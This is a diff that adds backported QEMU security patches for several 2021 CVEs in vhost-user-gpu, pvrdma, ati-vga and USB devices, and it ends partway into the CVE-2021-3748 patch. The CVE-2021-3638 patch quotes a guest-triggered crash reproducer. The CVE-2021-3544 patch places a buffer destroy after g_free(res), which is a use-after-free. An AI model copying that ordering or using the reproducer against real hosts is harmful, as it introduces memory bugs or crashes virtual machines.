--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544.patch
@@ -0,0 +1,29 @@
+vhost-user-gpu: fix resource leak in 'vg_resource_create_2d' (CVE-2021-3544)
+
+Call 'vugbm_buffer_destroy' in error path to avoid resource leak.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-3-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+[vhost-user-gpu does not exist in 4.2.0]
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -328,6 +328,7 @@ vg_resource_create_2d(VuGpu *g,
+ g_critical("%s: resource creation failed %d %d %d",
+ __func__, c2d.resource_id, c2d.width, c2d.height);
+ g_free(res);
++ vugbm_buffer_destroy(&res->buffer);
+ cmd->error = VIRTIO_GPU_RESP_ERR_OUT_OF_MEMORY;
+ return;
+ }
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
new file mode 100644
index 0000000000..36cbb127f8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_2.patch
@@ -0,0 +1,39 @@
+vhost-user-gpu: fix memory leak in vg_resource_attach_backing (CVE-2021-3544)
+
+
+Check whether the 'res' has already been attach_backing to avoid
+memory leak.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+virtio-gpu fix: 204f01b3
+
+ ("virtio-gpu: fix memory leak
+ in resource attach backing")
+ Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+ Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+ Message-Id: <20210516030403.107723-4-liq3ea@163.com>
+ Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+[vhost-user-gpu does not exist in 4.2.0 context]
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -468,6 +468,11 @@ vg_resource_attach_backing(VuGpu *g,
+ return;
+ }
+
++ if (res->iov) {
++ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
++ return;
++ }
++
+ ret = vg_create_mapping_iov(g, &ab, cmd, &res->iov);
+ if (ret != 0) {
+ cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
new file mode 100644
index 0000000000..c534f4c24f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_3.patch
@@ -0,0 +1,39 @@
+vhost-user-gpu: fix memory leak while calling 'vg_resource_unref' (CVE-2021-3544)
+
+If the guest trigger following sequences, the attach_backing will be leaked:
+
+vg_resource_create_2d
+vg_resource_attach_backing
+vg_resource_unref
+
+This patch fix this by freeing 'res->iov' in vg_resource_destroy.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+virtio-gpu fix: 5e8e3c4c
+
+("virtio-gpu: fix resource leak
+in virgl_cmd_resource_unref")
+Reviewed-by: default avatarPrasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-5-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+[vhost-user-gpu does not exist in the 4.2.0]
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/main.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/main.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/main.c
+@@ -379,6 +379,7 @@ vg_resource_destroy(VuGpu *g,
+ }
+
+ vugbm_buffer_destroy(&res->buffer);
++ g_free(res->iov);
+ pixman_image_unref(res->image);
+ QTAILQ_REMOVE(&g->reslist, res, next);
+ g_free(res);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
new file mode 100644
index 0000000000..96e36eb854
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_4.patch
@@ -0,0 +1,46 @@
+vhost-user-gpu: fix memory leak in 'virgl_cmd_resource_unref' (CVE-2021-3544)
+
+The 'res->iov' will be leaked if the guest trigger following sequences:
+
+virgl_cmd_create_resource_2d
+virgl_resource_attach_backing
+virgl_cmd_resource_unref
+
+This patch fixes this.
+
+Fixes: CVE-2021-3544
+Reported-by: default avatarLi Qiang <liq3ea@163.com>
+virtio-gpu fix: 5e8e3c4c
+
+("virtio-gpu: fix resource leak
+in virgl_cmd_resource_unref"
+Signed-off-by: default avatarLi Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau's avatarMarc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-6-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann's avatarGerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -105,9 +105,16 @@ virgl_cmd_resource_unref(VuGpu *g,
+ struct virtio_gpu_ctrl_command *cmd)
+ {
+ struct virtio_gpu_resource_unref unref;
++ struct iovec *res_iovs = NULL;
++ int num_iovs = 0;
+
+ VUGPU_FILL_CMD(unref);
+
++ virgl_renderer_resource_detach_iov(unref.resource_id,
++ &res_iovs,
++ &num_iovs);
++ g_free(res_iovs);
++
+ virgl_renderer_resource_unref(unref.resource_id);
+ }
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
new file mode 100644
index 0000000000..e592ce50e2
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3544_5.patch
@@ -0,0 +1,47 @@
+From 63736af5a6571d9def93769431e0d7e38c6677bf Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:01 -0700
+Subject: [PATCH] vhost-user-gpu: fix memory leak in
+ 'virgl_resource_attach_backing' (CVE-2021-3544)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_renderer_resource_attach_iov' failed, the 'res_iovs' will
+be leaked.
+
+Fixes: CVE-2021-3544
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 33243031da ("virtio-gpu-3d: fix memory leak
+in resource attach backing")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-7-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3544
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -283,8 +283,11 @@ virgl_resource_attach_backing(VuGpu *g,
+ return;
+ }
+
+- virgl_renderer_resource_attach_iov(att_rb.resource_id,
++ ret = virgl_renderer_resource_attach_iov(att_rb.resource_id,
+ res_iovs, att_rb.nr_entries);
++ if (ret != 0) {
++ g_free(res_iovs);
++ }
+ }
+
+ static void
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
new file mode 100644
index 0000000000..fcdda64437
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3545.patch
@@ -0,0 +1,41 @@
+From 121841b25d72d13f8cad554363138c360f1250ea Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:03:56 -0700
+Subject: [PATCH] vhost-user-gpu: fix memory disclosure in
+ virgl_cmd_get_capset_info (CVE-2021-3545)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Otherwise some of the 'resp' will be leaked to guest.
+
+Fixes: CVE-2021-3545
+Reported-by: Li Qiang <liq3ea@163.com>
+virtio-gpu fix: 42a8dadc74 ("virtio-gpu: fix information leak
+in getting capset info dispatch")
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-2-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3545
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -132,6 +132,7 @@ virgl_cmd_get_capset_info(VuGpu *g,
+
+ VUGPU_FILL_CMD(info);
+
++ memset(&resp, 0, sizeof(resp));
+ if (info.capset_index == 0) {
+ resp.capset_id = VIRTIO_GPU_CAPSET_VIRGL;
+ virgl_renderer_get_cap_set(resp.capset_id,
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
new file mode 100644
index 0000000000..f8da428233
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch
@@ -0,0 +1,47 @@
+From 9f22893adcb02580aee5968f32baa2cd109b3ec2 Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Sat, 15 May 2021 20:04:02 -0700
+Subject: [PATCH] vhost-user-gpu: fix OOB write in 'virgl_cmd_get_capset'
+ (CVE-2021-3546)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If 'virgl_cmd_get_capset' set 'max_size' to 0,
+the 'virgl_renderer_fill_caps' will write the data after the 'resp'.
+This patch avoid this by checking the returned 'max_size'.
+
+virtio-gpu fix: abd7f08b23 ("display: virtio-gpu-3d: check
+virgl capabilities max_size")
+
+Fixes: CVE-2021-3546
+Reported-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210516030403.107723-8-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2021-3546
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ contrib/vhost-user-gpu/virgl.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+===================================================================
+--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c
++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c
+@@ -174,6 +174,10 @@ virgl_cmd_get_capset(VuGpu *g,
+
+ virgl_renderer_get_cap_set(gc.capset_id, &max_ver,
+ &max_size);
++ if (!max_size) {
++ cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER;
++ return;
++ }
+ resp = g_malloc0(sizeof(*resp) + max_size);
+
+ resp->hdr.type = VIRTIO_GPU_RESP_OK_CAPSET;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
new file mode 100644
index 0000000000..7a88e29384
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch
@@ -0,0 +1,47 @@
+From 284f191b4abad213aed04cb0458e1600fd18d7c4 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel@redhat.com>
+Date: Wed, 16 Jun 2021 14:06:00 +0300
+Subject: [PATCH] hw/rdma: Fix possible mremap overflow in the pvrdma device
+ (CVE-2021-3582)
+
+Ensure mremap boundaries not trusting the guest kernel to
+pass the correct buffer length.
+
+Fixes: CVE-2021-3582
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210616110600.20889-1-marcel.apfelbaum@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3582
+Upstream-Status: Backport [284f191b4abad213aed04cb0458e1600fd18d7c4]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_cmd.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_cmd.c b/hw/rdma/vmw/pvrdma_cmd.c
+index f59879e257..da7ddfa548 100644
+--- a/hw/rdma/vmw/pvrdma_cmd.c
++++ b/hw/rdma/vmw/pvrdma_cmd.c
+@@ -38,6 +38,13 @@ static void *pvrdma_map_to_pdir(PCIDevice *pdev, uint64_t pdir_dma,
+ return NULL;
+ }
+
++ length = ROUND_UP(length, TARGET_PAGE_SIZE);
++ if (nchunks * TARGET_PAGE_SIZE != length) {
++ rdma_error_report("Invalid nchunks/length (%u, %lu)", nchunks,
++ (unsigned long)length);
++ return NULL;
++ }
++
+ dir = rdma_pci_dma_map(pdev, pdir_dma, TARGET_PAGE_SIZE);
+ if (!dir) {
+ rdma_error_report("Failed to map to page directory");
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
new file mode 100644
index 0000000000..0547c74484
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch
@@ -0,0 +1,43 @@
+From 32e5703cfea07c91e6e84bcb0313f633bb146534 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:46:34 +0300
+Subject: [PATCH] pvrdma: Ensure correct input on ring init (CVE-2021-3607)
+
+Check the guest passed a non zero page count
+for pvrdma device ring buffers.
+
+Fixes: CVE-2021-3607
+Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630114634.2168872-1-marcel@redhat.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3607
+Upstream-Status: Backport [32e5703cfea07c91e6e84bcb0313f633bb146534]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_main.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/rdma/vmw/pvrdma_main.c b/hw/rdma/vmw/pvrdma_main.c
+index 84ae8024fc..7c0c3551a8 100644
+--- a/hw/rdma/vmw/pvrdma_main.c
++++ b/hw/rdma/vmw/pvrdma_main.c
+@@ -92,6 +92,11 @@ static int init_dev_ring(PvrdmaRing *ring, PvrdmaRingState **ring_state,
+ uint64_t *dir, *tbl;
+ int rc = 0;
+
++ if (!num_pages) {
++ rdma_error_report("Ring pages count must be strictly positive");
++ return -EINVAL;
++ }
++
+ dir = rdma_pci_dma_map(pci_dev, dir_addr, TARGET_PAGE_SIZE);
+ if (!dir) {
+ rdma_error_report("Failed to map to page directory (ring %s)", name);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
new file mode 100644
index 0000000000..7055ec3d23
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch
@@ -0,0 +1,40 @@
+From 66ae37d8cc313f89272e711174a846a229bcdbd3 Mon Sep 17 00:00:00 2001
+From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+Date: Wed, 30 Jun 2021 14:52:46 +0300
+Subject: [PATCH] pvrdma: Fix the ring init error flow (CVE-2021-3608)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Do not unmap uninitialized dma addresses.
+
+Fixes: CVE-2021-3608
+Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com>
+Signed-off-by: Marcel Apfelbaum <marcel@redhat.com>
+Message-Id: <20210630115246.2178219-1-marcel@redhat.com>
+Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com>
+
+CVE: CVE-2021-3608
+Upstream-Status: Backport [66ae37d8cc313f89272e711174a846a229bcdbd3]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/rdma/vmw/pvrdma_dev_ring.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
+===================================================================
+--- qemu-4.2.0.orig/hw/rdma/vmw/pvrdma_dev_ring.c
++++ qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c
+@@ -41,7 +41,7 @@ int pvrdma_ring_init(PvrdmaRing *ring, c
+ atomic_set(&ring->ring_state->cons_head, 0);
+ */
+ ring->npages = npages;
+- ring->pages = g_malloc(npages * sizeof(void *));
++ ring->pages = g_malloc0(npages * sizeof(void *));
+
+ for (i = 0; i < npages; i++) {
+ if (!tbl[i]) {
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
new file mode 100644
index 0000000000..6e7af8540a
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3638.patch
@@ -0,0 +1,80 @@
+From b68d13531d8882ba66994b9f767b6a8f822464f3 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Fri, 11 Nov 2022 12:43:26 +0530
+Subject: [PATCH] CVE-2021-3638
+
+Upstream-Status: Backport [https://lists.nongnu.org/archive/html/qemu-devel/2021-09/msg01682.html]
+CVE: CVE-2021-3638
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+When building QEMU with DEBUG_ATI defined then running with
+'-device ati-vga,romfile="" -d unimp,guest_errors -trace ati\*'
+we get:
+
+ ati_mm_write 4 0x16c0 DP_CNTL <- 0x1
+ ati_mm_write 4 0x146c DP_GUI_MASTER_CNTL <- 0x2
+ ati_mm_write 4 0x16c8 DP_MIX <- 0xff0000
+ ati_mm_write 4 0x16c4 DP_DATATYPE <- 0x2
+ ati_mm_write 4 0x224 CRTC_OFFSET <- 0x0
+ ati_mm_write 4 0x142c DST_PITCH_OFFSET <- 0xfe00000
+ ati_mm_write 4 0x1420 DST_Y <- 0x3fff
+ ati_mm_write 4 0x1410 DST_HEIGHT <- 0x3fff
+ ati_mm_write 4 0x1588 DST_WIDTH_X <- 0x3fff3fff
+ ati_2d_blt: vram:0x7fff5fa00000 addr:0 ds:0x7fff61273800 stride:2560 bpp:32
+rop:0xff
+ ati_2d_blt: 0 0 0, 0 127 0, (0,0) -> (16383,16383) 16383x16383 > ^
+ ati_2d_blt: pixman_fill(dst:0x7fff5fa00000, stride:254, bpp:8, x:16383,
+y:16383, w:16383, h:16383, xor:0xff000000)
+ Thread 3 "qemu-system-i38" received signal SIGSEGV, Segmentation fault.
+ (gdb) bt
+ #0 0x00007ffff7f62ce0 in sse2_fill.lto_priv () at /lib64/libpixman-1.so.0
+ #1 0x00007ffff7f09278 in pixman_fill () at /lib64/libpixman-1.so.0
+ #2 0x0000555557b5a9af in ati_2d_blt (s=0x631000028800) at
+hw/display/ati_2d.c:196
+ #3 0x0000555557b4b5a2 in ati_mm_write (opaque=0x631000028800, addr=5512,
+data=1073692671, size=4) at hw/display/ati.c:843
+ #4 0x0000555558b90ec4 in memory_region_write_accessor (mr=0x631000039cc0,
+addr=5512, ..., size=4, ...) at softmmu/memory.c:492
+
+Commit 584acf34cb0 ("ati-vga: Fix reverse bit blts") introduced
+the local dst_x and dst_y which adjust the (x, y) coordinates
+depending on the direction in the SRCCOPY ROP3 operation, but
+forgot to address the same issue for the PATCOPY, BLACKNESS and
+WHITENESS operations, which also call pixman_fill().
+
+Fix that now by using the adjusted coordinates in the pixman_fill
+call, and update the related debug printf().
+---
+ hw/display/ati_2d.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/display/ati_2d.c b/hw/display/ati_2d.c
+index 4dc10ea7..692bec91 100644
+--- a/hw/display/ati_2d.c
++++ b/hw/display/ati_2d.c
+@@ -84,7 +84,7 @@ void ati_2d_blt(ATIVGAState *s)
+ DPRINTF("%d %d %d, %d %d %d, (%d,%d) -> (%d,%d) %dx%d %c %c\n",
+ s->regs.src_offset, s->regs.dst_offset, s->regs.default_offset,
+ s->regs.src_pitch, s->regs.dst_pitch, s->regs.default_pitch,
+- s->regs.src_x, s->regs.src_y, s->regs.dst_x, s->regs.dst_y,
++ s->regs.src_x, s->regs.src_y, dst_x, dst_y,
+ s->regs.dst_width, s->regs.dst_height,
+ (s->regs.dp_cntl & DST_X_LEFT_TO_RIGHT ? '>' : '<'),
+ (s->regs.dp_cntl & DST_Y_TOP_TO_BOTTOM ? 'v' : '^'));
+@@ -180,11 +180,11 @@ void ati_2d_blt(ATIVGAState *s)
+ dst_stride /= sizeof(uint32_t);
+ DPRINTF("pixman_fill(%p, %d, %d, %d, %d, %d, %d, %x)\n",
+ dst_bits, dst_stride, bpp,
+- s->regs.dst_x, s->regs.dst_y,
++ dst_x, dst_y,
+ s->regs.dst_width, s->regs.dst_height,
+ filler);
+ pixman_fill((uint32_t *)dst_bits, dst_stride, bpp,
+- s->regs.dst_x, s->regs.dst_y,
++ dst_x, dst_y,
+ s->regs.dst_width, s->regs.dst_height,
+ filler);
+ if (dst_bits >= s->vga.vram_ptr + s->vga.vbe_start_addr &&
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
new file mode 100644
index 0000000000..50a49233d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch
@@ -0,0 +1,41 @@
+From 5e796671e6b8d5de4b0b423dce1b3eba144a92c9 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 22 Jul 2021 09:27:56 +0200
+Subject: [PATCH] usbredir: fix free call
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+data might point into the middle of a larger buffer, there is a separate
+free_on_destroy pointer passed into bufp_alloc() to handle that. It is
+only used in the normal workflow though, not when dropping packets due
+to the queue being full. Fix that.
+
+Resolves: https://gitlab.com/qemu-project/qemu/-/issues/491
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com>
+Message-Id: <20210722072756.647673-1-kraxel@redhat.com>
+
+CVE: CVE-2021-3682
+Upstream-Status: Backport [5e796671e6b8d5de4b0b423dce1b3eba144a92c9]
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/usb/redirect.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c
+index 4ec9326e05..1ec909a63a 100644
+--- a/hw/usb/redirect.c
++++ b/hw/usb/redirect.c
+@@ -476,7 +476,7 @@ static int bufp_alloc(USBRedirDevice *dev, uint8_t *data, uint16_t len,
+ if (dev->endpoint[EP2I(ep)].bufpq_dropping_packets) {
+ if (dev->endpoint[EP2I(ep)].bufpq_size >
+ dev->endpoint[EP2I(ep)].bufpq_target_size) {
+- free(data);
++ free(free_on_destroy);
+ return -1;
+ }
+ dev->endpoint[EP2I(ep)].bufpq_dropping_packets = 0;
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
new file mode 100644
index 0000000000..cdd9c38db9
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3713.patch
@@ -0,0 +1,67 @@
+From a114d6baedf2cccb454a46d36e399fec1bc3e1c0 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Wed, 18 Aug 2021 14:05:05 +0200
+Subject: [PATCH] uas: add stream number sanity checks.
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The device uses the guest-supplied stream number unchecked, which can
+lead to guest-triggered out-of-band access to the UASDevice->data3 and
+UASDevice->status3 fields. Add the missing checks.
+
+Fixes: CVE-2021-3713
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reported-by: Chen Zhe <chenzhe@huawei.com>
+Reported-by: Tan Jingguo <tanjingguo@huawei.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-Id: <20210818120505.1258262-2-kraxel@redhat.com>
+
+https://gitlab.com/qemu-project/qemu/-/commit/13b250b12ad3c59114a6a17d59caf073ce45b33a
+CVE: CVE-2021-3713
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/usb/dev-uas.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/hw/usb/dev-uas.c b/hw/usb/dev-uas.c
+index 6d6d1073..0b8cd4dd 100644
+--- a/hw/usb/dev-uas.c
++++ b/hw/usb/dev-uas.c
+@@ -830,6 +830,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ }
+ break;
+ case UAS_PIPE_ID_STATUS:
++ if (p->stream > UAS_MAX_STREAMS) {
++ goto err_stream;
++ }
+ if (p->stream) {
+ QTAILQ_FOREACH(st, &uas->results, next) {
+ if (st->stream == p->stream) {
+@@ -857,6 +860,9 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ break;
+ case UAS_PIPE_ID_DATA_IN:
+ case UAS_PIPE_ID_DATA_OUT:
++ if (p->stream > UAS_MAX_STREAMS) {
++ goto err_stream;
++ }
+ if (p->stream) {
+ req = usb_uas_find_request(uas, p->stream);
+ } else {
+@@ -892,6 +898,11 @@ static void usb_uas_handle_data(USBDevice *dev, USBPacket *p)
+ p->status = USB_RET_STALL;
+ break;
+ }
++
++err_stream:
++ error_report("%s: invalid stream %d", __func__, p->stream);
++ p->status = USB_RET_STALL;
++ return;
+ }
+
+ static void usb_uas_unrealize(USBDevice *dev, Error **errp)
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
new file mode 100644
index 0000000000..b291ade4e3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3748.patch
@@ -0,0 +1,124 @@
+From bedd7e93d01961fcb16a97ae45d93acf357e11f6 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
